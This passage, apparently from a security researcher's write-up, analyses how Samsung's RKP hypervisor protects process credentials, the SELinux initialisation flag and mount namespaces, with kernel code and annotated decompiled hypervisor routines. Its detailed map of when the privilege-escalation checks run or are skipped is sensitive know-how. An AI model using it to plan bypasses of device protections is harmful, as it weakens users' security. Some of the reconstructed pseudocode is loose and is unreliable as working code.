  if (!strcmp(name_pa, "/system/bin/patchoat")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  }
}

Credentials Change

When the kernel needs to change the credentials of a task, it calls into the hypervisor, which does some extensive checking to detect privilege escalation attempts. Before digging into the hypervisor side, let's see how a cred structure is assigned to a task_struct.

cred structures are allocated from three places. The first one is the copy_creds function. In addition to a comment stating the credentials are no longer shared among the same thread group, we can see that the return value of the prepare_ro_creds function is assigned to the cred field of the task_struct.

int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
    // ...
    /*
     * Disabling cred sharing among the same thread group. This
     * is needed because we only added one back pointer in cred.
     *
     * This should NOT in any way change kernel logic, if we think about what
     * happens when a thread needs to change its credentials: it will just
     * create a new one, while all other threads in the same thread group still
     * reference the old one, whose reference counter decreases by 2.
     */
    // ...
    if(rkp_cred_enable){
        p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
        put_cred(new);
    }
    // ...
}

The second place is the commit_creds function. It ensures that the new credentials are protected by the hypervisor by calling rkp_ro_page, before also assigning to the cred of the current task_struct the return value of the prepare_ro_creds function.

int commit_creds(struct cred *new)
{

    if (rkp_ro_page((unsigned long)new))
        BUG_ON((rocred_uc_read(new)) < 1);
    else
        // ...
    if(rkp_cred_enable) {
        struct cred *new_ro;

        new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);

        rcu_assign_pointer(task->real_cred, new_ro);
        rcu_assign_pointer(task->cred, new_ro);
    } 
    else {
        // ...
    }
  // ...
    if (rkp_cred_enable){
        put_cred(new);
        put_cred(new);
    }
  // ...
}

The third place is the override_creds function. Yet again, we can see another call to prepare_ro_creds before assigning the return value to the cred field of the current task_struct.

#define override_creds(x) rkp_override_creds(&x)
const struct cred *rkp_override_creds(struct cred **cnew)
{
    // ...
    struct cred *new = *cnew;
    // ...
    if(rkp_cred_enable) {
        volatile unsigned int rkp_use_count = rkp_get_usecount(new);
        struct cred *new_ro;

        new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
        *cnew = new_ro;
        rcu_assign_pointer(current->cred, new_ro);
        put_cred(new);
    }
    else {
        // ...
    }
    // ...
}

prepare_ro_creds allocates a new read-only cred structure from the cred_jar_ro cache. We have seen in the Credentials Protection section that new fields have been added to this structure. In particular, the use_cnt field, the reference count for the cred structure, needs to be modified often. To work around that, a pointer to a read-write structure containing the reference count is stored in the read-only cred structure. prepare_ro_creds thus also allocates a new read-write reference count. It then allocates a new read-only task_security_struct from the tsec_jar.

It uses the rkp_cred_fill_params macro and invokes the RKP_KDP_X46 command to let the hypervisor perform its verifications and copy the data from the read-write version of the cred structure (the argument) to the read-only one (the newly allocated one). It finally does some sanity-checking, depending on where prepare_ro_creds was called, before returning the read-only version of the cred structure.

static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
    u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
    struct cred *new_ro;
    void *use_cnt_ptr = NULL;
    void *rcu_ptr = NULL;
    void *tsec = NULL;
    cred_param_t cred_param;
    new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
    if (!new_ro)
        panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);

    use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
    if (!use_cnt_ptr)
        panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);

    rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
    ((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;

    tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
    if (!tsec)
        panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);

    rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
    uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
    if (kdp_cmd == RKP_CMD_COPY_CREDS) {
        if ((new_ro->bp_task != (void *)p) 
            || new_ro->security != tsec 
            || new_ro->use_cnt != use_cnt_ptr) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
        }
    }
    else {
        if ((new_ro->bp_task != current)||
            (current->mm 
            && new_ro->bp_pgd != (void *)pgd) ||
            (new_ro->security != tsec) ||
            (new_ro->use_cnt != use_cnt_ptr)) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
        }
    }

    rocred_uc_set(new_ro, 2);

    set_cred_subscribers(new_ro, 0);
    get_group_info(new_ro->group_info);
    get_uid(new_ro->user);
    get_user_ns(new_ro->user_ns);

#ifdef CONFIG_KEYS
    key_get(new_ro->session_keyring);
    key_get(new_ro->process_keyring);
    key_get(new_ro->thread_keyring);
    key_get(new_ro->request_key_auth);
#endif

    validate_creds(new_ro);
    return new_ro;
}

The rkp_cred_fill_params macro simply fills the fields of the cred_param_t structure given as an argument to the RKP command.

typedef struct cred_param{
    struct cred *cred;
    struct cred *cred_ro;
    void *use_cnt_ptr;
    void *sec_ptr;
    unsigned long type;
    union {
        void *task_ptr;
        u64 use_cnt;
    };
}cred_param_t;
#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do {                        \
    cred_param.cred = crd;      \
    cred_param.cred_ro = crd_ro;        \
    cred_param.use_cnt_ptr = uptr;      \
    cred_param.sec_ptr= tsec;       \
    cred_param.type = rkp_cmd_type;     \
    cred_param.use_cnt = (u64)rkp_use_cnt;      \
} while(0)

On the hypervisor side, the command is handled by the rkp_cmd_assign_creds function, which calls rkp_assign_creds.

rkp_assign_creds does a lot of checks that can be summarized as follows (where "current" refers to the cred of the current task, "old" refers to the read-write cred, and "new" refers to the read-only cred structure):

  • the current back-pointers integrity is checked;
  • the old cred structure must be protected by the hypervisor;
  • for non "Linux on Dex" current tasks,
    • if its IDs are not LOD prefixed and the device is locked, rkp_check_pe and from_zyg_adbd are called to detect privilege escalation;
    • if its IDs are LOD prefixed, the current task is marked as CRED_FLAG_LOD;
  • check_privilege_escalation is called for each UID, EUID, GID, and EGID pair of the old and current tasks to detect privilege escalation;
  • the old cred is copied into the new cred structure, and its use_cnt field is set;
  • for non copy_creds callers, the back-pointers of the new cred structure are set from the current task;
  • for the override_creds caller, the new cred structure is marked CRED_FLAG_ORPHAN if the usage count given as argument is less than or equal to 1, or it is unmarked otherwise;
  • for the copy_creds caller, the back-pointer is set from the task being copied;
  • the new task_security_struct must be protected by the hypervisor;
  • if RKP is deferred initialized, the old SID cannot be lesser than 20 if the new SID is greater than 20;
  • the old task_security_struct is copied into the new task_security_struct, and the back-pointers are set accordingly;
  • if the device is locked and the current parent task is marked CRED_FLAG_MARK_PPT, the new task is marked CRED_FLAG_MARK_PPT.
void rkp_assign_creds(saved_regs_t* regs) {
  // ...

  // Convert the VA of the argument structure to a PA.
  cred_param = rkp_get_pa(regs->x2);
  if (!cred_param) {
    uh_log('L', "rkp_kdp.c", 662, "NULL pData");
    return;
  }
  // Get the current task_struct in the kernel.
  curr_task_va = rkp_ns_get_current();
  // Convert the current task_struct VA into a PA.
  curr_task = rkp_get_pa(curr_task_va);
  // Get the current cred structure from the current task_struct.
  curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
  // Convert the current cred structure VA into a PA.
  curr_cred = rkp_get_pa(curr_cred_va);
  // Get the target RW cred from the argument structure and convert it from a VA to a PA.
  targ_cred = rkp_get_pa(cred_param->cred);
  // Get the target RO cred from the argument structure and convert it from a VA to a PA.
  targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
  // Get the current task_security_struct from the current cred structure.
  curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
  // Convert the current task_security_struct from a VA to a PA.
  curr_secptr = rkp_get_pa(curr_secptr_va);
  // Sanity-check: the current cred structure must be non NULL.
  if (!curr_cred) {
    uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
  }
  // Sanity-check: the current task_security_struct must be non NULL, or RKP must not be deferred initialized.
  if (!curr_secptr && rkp_deferred_inited) {
    uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL  %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
  }
  // Get the back-pointer (a cred structure pointer) of the current task_security_struct.
  bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
  // Get the back-pointer (a task_struct pointer) of the current cred structure.
  bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
  // Sanity-check: the back-pointers must point to the current cred structure and current task_struct respectively.
  if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
    uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1  %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
    uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
    rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
    return;
  }
  // Sanity-check: the target RW and RO cred structures must be non NULL and the target RO cred structure must be marked
  // as `CRED` in the physmap.
  if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
    uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
    return;
  }
  skip_checks = 0;
  // Get the type field (used to process marking) from the current cred structure.
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the current task is not a "Linux on Dex" process.
  if ((curr_flags & CRED_FLAG_LOD) == 0) {
    // Get the uid, euid, gid, egid fields from the current cred structure.
    curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
    curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
    curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
    curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
    // If none of those fields have the LOD prefix (0x61a8).
    if ((curr_uid & 0xffff0000) != 0x61a80000 && (curr_euid & 0xffff0000) != 0x61a80000 &&
        (curr_gid & 0xffff0000) != 0x61a80000 && (curr_egid & 0xffff0000) != 0x61a80000) {
      // And if the device is locked.
      if (!rkp_cred->VERIFIED_BOOT_STATE) {
        // Call `rkp_check_pe` and `from_zyg_adbd` to detect instances of privilege escalation.
        if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
          uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
                 *(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
          // If either of these 2 functions returned true, call `rkp_privilege_escalation` to handle it.
          return rkp_privilege_escalation(targ_cred, cred_pa, 1);
        }
      }
      // If the device is locked, or no privilege escalation was detected, skip the next checks.
      skip_checks = 1;
    }
    // If the current task has a LOD prefixed field, mark it as `CRED_FLAG_LOD`.
    else {
      *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
    }
  }
  // If the checks are not skipped.
  if (!skip_checks) {
    // Get the uid field of the target RW cred structure.
    targ_uid = *(targ_cred + rkp_cred->CRED_UID_OFFSET);
    priv_esc = 0;
    // If the uid is not INET (3003).
    if (targ_uid != 3003) {
      // Get the uid field of the current cred structure.
      curr_uid = *(cred_pa + 4 * rkp_cred->CRED_UID_OFFSET);
      priv_esc = 0;
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_uid, curr_uid)) {
        uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
               targ_uid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the euid field of the target RW cred structure.
    targ_euid = *(targ_cred + rkp_cred->CRED_EUID_OFFSET);
    // If the euid is not INET (3003).
    if (targ_euid != 3003) {
      // Get the euid field of the current cred structure.
      curr_euid = *(cred_pa + 4 * rkp_cred->CRED_EUID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_euid, curr_euid)) {
        uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
               targ_euid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the gid field of the target RW cred structure.
    targ_gid = *(targ_cred + rkp_cred->CRED_GID_OFFSET);
    // If the gid is not INET (3003).
    if (targ_gid != 3003) {
      // Get the gid field of the current cred structure.
      curr_gid = *(cred_pa + 4 * rkp_cred->CRED_GID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_gid, curr_gid)) {
        uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
               targ_gid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the egid field of the target RW cred structure.
    targ_egid = *(targ_cred + rkp_cred->CRED_EGID_OFFSET);
    // If the egid is not INET (3003).
    if (targ_egid != 3003) {
      // Get the egid field of the current cred structure.
      curr_egid = *(cred_pa + 4 * rkp_cred->CRED_EGID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_egid, curr_egid)) {
        uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
               targ_egid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // If privilege escalation was detected on the UID, EUID, GID or EGID.
    if (priv_esc) {
      uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx  ", targ_cred);
      if (curr_task) {
        curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
        uh_log('L', "rkp_kdp.c", 707, curr_comm);
      }
      // Call `rkp_privilege_escalation` to handle it.
      return rkp_privilege_escalation(param_cred_pa, cred_pa, 1);
    }
  }
  // The checks passed, copy the RW cred into the RO cred structure.
  memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
  cmd_type = cred_param->type;
  // Set the use_cnt field of the RO cred structure.
  *(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
  // If the caller of `prepare_ro_creds` was not `copy_creds`.
  if (cmd_type != RKP_CMD_COPY_CREDS) {
    // Get the current mm_struct from the current cred structure.
    curr_mm_va = *(current_pa + 8 * rkp_cred->TASK_MM_OFFSET);
    // If the current mm_struct is not NULL.
    if (curr_mm_va) {
      curr_mm = rkp_get_pa(curr_mm_va);
      // Extract the current PGD from it.
      curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
    } else {
      // Otherwise, get it from TTBR1_EL1.
      curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xffffffffc000);
    }
    // Set the bp_pgd and bp_task fields of the RO cred structure.
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
    // If the caller of `prepare_ro_creds` is `override_creds`.
    if (cmd_type == RKP_CMD_OVRD_CREDS) {
      // If the argument structure usage counter is lower or equal to 1, unmark the target RO cred as
      // `CRED_FLAG_ORPHAN`.
      if (cred_param->use_cnt <= 1) {
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
      }
      // Otherwise, mark the target RO cred as `CRED_FLAG_ORPHAN`.
      else {
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
      }
    }
  }
  // If the caller of `prepare_ro_creds` is `copy_creds`, set the bp_task field of the RO cred structure to the current
  // task_struct.
  else {
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
  }
  // Get the new task_security_struct from the argument structure.
  newsec_ptr_va = cred_param->sec_ptr;
  // Get the target RO cred structure from the argument structure.
  targ_cred_ro_va = cred_param->cred_ro;
  // If the new task_security_struct is not NULL.
  if (newsec_ptr_va) {
    // Convert the new task_security_struct from a VA to a PA.
    newsec_ptr = rkp_get_pa(newsec_ptr_va);
    // Get the old task_security_struct from the target RW cred structure.
    oldsec_ptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
    // Convert the old task_security_struct from a VA to a PA.
    oldsec_ptr = rkp_get_pa(oldsec_ptr_va);
    // Call `chk_invalid_sec_ptr` to check if the new task_security_struct is hypervisor-protected, and ensure both the
    // old and the new task_security_struct are non NULL.
    if (chk_invalid_sec_ptr(newsec_ptr) || !oldsec_ptr || !newsec_ptr) {
      uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", newsec_ptr_va, newsec_ptr,
             oldsec_ptr);
      // Otherwise, trigger a policy violation.
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", newsec_ptr_va, oldsec_ptr, newsec_ptr);
    }
    // If the old and new task_security_struct are valid.
    else {
      // Get the new sid from the new task_security_struct.
      new_sid = *(newsec_ptr + 4);
      // Get the old sid from the old task_security_struct.
      old_sid = *(oldsec_ptr + 4);
      // If RKP is deferred initialized and the SID jumps from below to above `sysctl_net` (20).
      if (rkp_deferred_inited && old_sid < 20 && new_sid > 20) {
        uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", old_sid, new_sid);
        // Trigger a policy violation.
        rkp_policy_violation("Data Protection Violation %lx %lx %lx", old_sid, new_sid, 0);
      } else {
        // Copy the old task_security_struct to the new one.
        memcpy(newsec_ptr, oldsec_ptr, rkp_cred->SP_SIZE);
        // Set the security field of the target RO cred structure to the new task_security_struct.
        *(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = newsec_ptr_va;
        // Set the bp_cred field of the new task_security_struct to the target RO cred structure.
        *(newsec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = targ_cred_ro_va;
      }
    }
  }
  // If the target task_security_struct is NULL, trigger a policy violation.
  else {
    uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
    rkp_policy_violation("Data Protection Violation", 0, 0, 0);
  }
  // If the device is unlocked, return immediately.
  if (rkp_cred->VERIFIED_BOOT_STATE) {
    return;
  }
  // Get the type field from the RO cred structure.
  targ_flags = *(targ_cred_ro + 8 * rkp_creds->CRED_FLAGS_OFFSET);
  // If the target task is not marked as `CRED_FLAG_MARK_PPT`.
  if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
    // Get the parent task_struct of the current task_struct.
    parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    // Convert the parent task_struct from a VA to a PA.
    parent_task = rkp_get_pa(parent_task_va);
    // Get the parent cred structure from the parent task_struct.
    parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
    // Convert the parent cred structure from a VA to a PA.
    parent_cred = rkp_get_pa(parent_cred_va);
    // Get the type field from the parent cred structure.
    parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
    // If the parent task is marked as `CRED_FLAG_MARK_PPT`.
    if ((parent_flags & CRED_FLAG_MARK_PPT) != 0) {
      // Mark the current task as `CRED_FLAG_MARK_PPT` too.
      *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
    }
  }
}

Let's now go over the different functions that are called by rkp_assign_creds. In particular, the functions that try to detect privilege escalation are really interesting from a security standpoint.

The rkp_ns_get_current function returns the current task of the kernel (stored in SP_EL0 or SP_EL1).

uint64_t rkp_ns_get_current() {
  // SPSel, Stack Pointer Select.
  //
  // SP, bit [0]: Stack pointer to use.
  if (get_sp_sel()) {
    return get_sp_el0();
  } else {
    return get_sp_el1();
  }
}

The rkp_check_pe function is called for non "Linux on Dex" processes when the device is locked. For each UID, GID, EUID, and EGID pair for the target RW cred and current cred structure, it calls the check_pe_id function to decide if this is an instance of privilege escalation. For effective IDs, the target one must also be lower than the current one. Otherwise, it is not considered privilege escalation.

bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
  // ...

  // Get the uid field of the current cred structure.
  curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  // Get the uid field of the target RW cred structure.
  targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  // Call `check_pe_id` to detect privilege escalation.
  if (check_pe_id(targ_uid, curr_uid)) {
    return 1;
  }
  // Get the gid field of the current cred structure.
  curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  // Get the gid field of the target RW cred structure.
  targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  // Call `check_pe_id` to detect privilege escalation.
  if (check_pe_id(targ_gid, curr_gid)) {
    return 1;
  }
  // Get the euid field of the current cred structure.
  curr_ueid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  // Get the euid field of the target RW cred structure.
  targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  // If the target euid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
  if (targ_euid < curr_uid && check_pe_id(targ_euid, curr_euid)) {
    return 1;
  }
  // Get the egid field of the current cred structure.
  curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  // Get the egid field of the target RW cred structure.
  targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  // If the target egid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
  if (targ_egid < curr_gid && check_pe_id(targ_egid, curr_egid)) {
    return 1;
  }
  return 0;
}

check_pe_id returns true if the current ID is bigger and the target ID is smaller or equal to 1000 (SYSTEM).

int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
  // PE is detected if the current ID is bigger and the target ID is smaller or equal to `SYSTEM` (1000).
  return curr_id > 1000 && targ_id <= 1000;
}

from_zyg_adbd is called under the same conditions as rkp_check_pe. It returns true if the current task is marked CRED_FLAG_CHILD_PPT or if it is a child of zygote, zygote64, or adbd.

int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
  // ...

  // Get the type field from the current cred structure.
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the current task is marked as CRED_FLAG_CHILD_PPT, return true.
  if ((curr_flags & CRED_FLAG_CHILD_PPT) != 0) {
    return 1;
  }
  // Iterate on the parents of the current task_struct.
  task = curr_task;
  while (1) {
    // Get the pid field of the parent task_struct.
    task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
    // If the parent pid is zero, return false.
    if (!task_pid) {
      return 0;
    }
    // Get the comm field of the parent task_struct.
    task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
    // Copy the task name into a local buffer.
    memcpy(comm, task_comm, sizeof(comm));
    // If the parent task is zygote, zygote64 or adbd, return true.
    if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd")) {
      return 1;
    }
    // Get the parent field of the parent task_struct.
    parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    // Convert the parent task_struct from a VA to a PA.
    task = parent_pa = rkp_get_pa(parent_va);
  }
}

check_privilege_escalation is called for each UID, EUID, GID, and EGID pair of the target RW cred and current cred structure. It returns true if the current ID is LOD prefixed (0x61a8xxxx) and the target ID isn't and isn't also equal to -1.

bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
  // PE is detected if the current ID is LOD prefixed but the target ID is not, and the target ID is not -1.
  return ((curr_id - 0x61a80000) <= 0xffff && (targ_id - 0x61a80000) > 0xffff && targ_id != -1);
}

When privilege escalation is detected in rkp_assign_creds, rkp_privilege_escalation is called. It simply triggers a policy violation.

int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
  uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}

The chk_invalid_sec_ptr function is called to verify that the new task_security_struct is valid (aligned on the structure size) and hypervisor-protected (marked as SEC_PTR in the physmap).

int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
  rkp_phys_map_lock(sec_ptr);
  // The start and end addresses of the task_security_struct must be marked as `SEC_PTR` on the physmap, and it must
  // also be aligned on the size of this structure.
  if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
      sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
    uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
           sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
    rkp_phys_map_unlock(sec_ptr);
    return 1;
  }
  rkp_phys_map_unlock(sec_ptr);
  return 0;
}

SELinux Initialization

In addition to protecting the task_security_struct of task, and making the selinux_enforcing and selinux_enabled global variables read-only, Samsung RKP also protects ss_initialized. This global variable, which indicates if SELinux is initialized, was targeted in a previous RKP bypass. To set this variable after the policy has been loaded, the kernel calls the hypervisor in the security_load_policy function. This function invokes the RKP_KDP_X60 command.

int security_load_policy(void *data, size_t len)
{
    // ...
        uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
    // ...
}

On the hypervisor side, this command is handled by the rkp_cmd_selinux_initialized function, which calls rkp_selinux_initialized. This function ensures ss_initialized is located in the kernel's rodata section and that the kernel is setting it to 1, before performing the write.

void rkp_selinux_initialized(saved_regs_t* regs) {
  // ...

  // Get the VA of `ss_initialized` from register x2.
  ss_initialized_va = regs->x2;
  // Get the value to set it to from register x3.
  value = regs->x3;
  // Convert the VA of `ss_initialized` to a PA.
  ss_initialized = rkp_get_pa(ss_initialized_va);
  if (ss_initialized) {
    // Ensure the `ss_initialized` is located in the kernel rodata section.
    if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
      // Trigger a policy violation if it isn't.
      rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
    }
    // Ensure it is located at the same address that was set in `rkp_cred_init` and provided by the kernel in
    // `kdp_init`.
    else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
      // The global variable can only be set to 1, never to any other value.
      if (value == 1) {
        // Perform the write on behalf of the kernel.
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
      } else {
        // Trigger a policy violation for other values.
        rkp_policy_violation("RKP_3ba4a93d");
      }
    }
    // Not sure what this is about. SELINUX is the PA of the selinux field of the rkp_init_t structure located on the
    // stack of the kernel function `kdp_init`. Maybe this is here to support older or future kernel versions?
    else if (ss_initialized == rkp_cred->SELINUX) {
      // This global variable can only be changed from any value but 1 to 1.
      if (value == 1 || *ss_initialized != 1) {
        // Perform the write on behalf of the kernel.
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
      } else {
        // Trigger a policy violation for other values.
        rkp_policy_violation("RKP_cef38ae5");
      }
    }
    // Trigger a policy violation if the address is unexpected.
    else {
      rkp_policy_violation("RKP_ced87e02");
    }
  } else {
    uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
  }
}

Mount Namespaces Protection

One last feature offered by the hypervisor is the protection of the mount namespaces (a set of filesystem mounts that are visible to a process).

Kernel Structures

The vfsmount instances, like the cred and task_security_struct structure instances, are allocated in read-only pages. This structure also gets a new field for storing the back-pointer to the mount structure that owns this instance.

struct vfsmount {
    // ...
    struct mount *bp_mount; /* pointer to mount*/
    // ...
} __randomize_layout;

The mount structure was also modified to contain a pointer to the vfsmount structure, instead of the structure itself.

struct mount {
    // ...
    struct vfsmount *mnt;
    // ...
} __randomize_layout;

In the Credentials Protection section, we explained that the security_integrity_current function is called in each SELinux security hook and that this function calls cmp_ns_integrity to verify the integrity of the mount namespace.

